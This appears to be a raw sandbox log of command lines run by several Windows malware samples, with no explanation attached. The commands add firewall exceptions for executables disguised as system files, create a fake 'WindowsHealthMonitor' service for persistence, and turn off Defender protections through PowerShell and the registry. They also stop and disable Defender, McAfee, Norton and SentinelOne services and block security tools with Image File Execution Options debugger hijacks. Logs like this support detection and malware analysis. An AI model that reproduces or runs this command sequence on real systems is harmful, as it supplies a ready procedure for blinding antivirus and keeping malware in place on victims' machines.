(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\1234.exe
(NULL) C:\Users\Ddavwsbn\AppData\Roaming\svchost.exe
netsh firewall add allowedprogram "C:\Users\Ddavwsbn\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
(NULL) C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe
netsh firewall add allowedprogram "C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE
(NULL) C:\Users\Qcobdeuv\AppData\Roaming\server.exe
netsh firewall add allowedprogram "C:\Users\Qcobdeuv\AppData\Roaming\server.exe" "server.exe" ENABLE
C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 904
"powershell.exe"
"C:\Users\Ieqllttt\AppData\Local\Temp\is-JH3NH.tmp\76a38d6844895bc102bf3dc9b87db06b3136c1b0_0009324323.tmp" /SL5="$50376,8477257,886272,c:\users\user\downloads\76a38d6844895bc102bf3dc9b87db06b3136c1b0_0009324323"
(NULL) C:\Users\Emccwdmp\AppData\Local\Temp\Realtek HD Audio Universal Service.exe
(NULL) C:\Users\Emccwdmp\AppData\Local\Temp\SAM X222C#.exe
(NULL) C:\Users\Raratezd\AppData\Local\Temp\winter.bll
"C:\Users\Falneayq\AppData\Roaming\Microsoft\Windows\RuntimeBroker.exe"
"C:\Users\Falneayq\AppData\Local\Microsoft\CLR\conhost.exe" --watcher 5744
"sc" query "WindowsHealthMonitor"
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSUAMain.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"powershell" -EP Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true -DisableBehaviorMonitoring $true -DisableScriptScanning $true -DisableBlockAtFirstSeen $true"
"sc" create "WindowsHealthMonitor" binPath= "C:\Users\Falneayq\AppData\Roaming\Microsoft\Windows\RuntimeBroker.exe" start= auto DisplayName= "Windows System Health Monitor"
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
WriteConsole: [SC] CreateServi
"sc" description "WindowsHealthMonitor" "Monitors system health and performance diagnostics."
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FSMA32.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
WriteConsole: [SC] ChangeServi
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fshoster.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"sc" failure "WindowsHealthMonitor" reset= 0 actions= restart/60000/restart/60000/restart/60000
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masvc.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"sc" start "WindowsHealthMonitor"
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McShield.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
WriteConsole: [SC] StartServic
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NortonSecurity.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"schtasks" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
"sc.exe" stop "WinDefend"
"schtasks" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
"sc.exe" config "WinDefend" start= disabled
"schtasks" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
"net.exe" stop "WinDefend" /y
"reg" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
"sc.exe" stop "WdNisSvc"
"sc.exe" config "WdNisSvc" start= disabled
"net.exe" stop "WdNisSvc" /y
"sc.exe" stop "SecurityHealthService"
"sc.exe" config "SecurityHealthService" start= disabled
"net.exe" stop "SecurityHealthService" /y
"sc.exe" stop "wscsvc"
"sc.exe" config "wscsvc" start= disabled
"net.exe" stop "wscsvc" /y
"sc.exe" stop "Sense"
"sc.exe" config "Sense" start= disabled
WriteConsole: [SC] OpenService
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelServiceHost.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"net.exe" stop "Sense" /y
"sc.exe" stop "McShield"
"sc.exe" config "McShield" start= disabled
"net.exe" stop "McShield" /y
"reg" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
"sc.exe" stop "masvc"
"sc.exe" config "masvc" start= disabled
"reg" QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid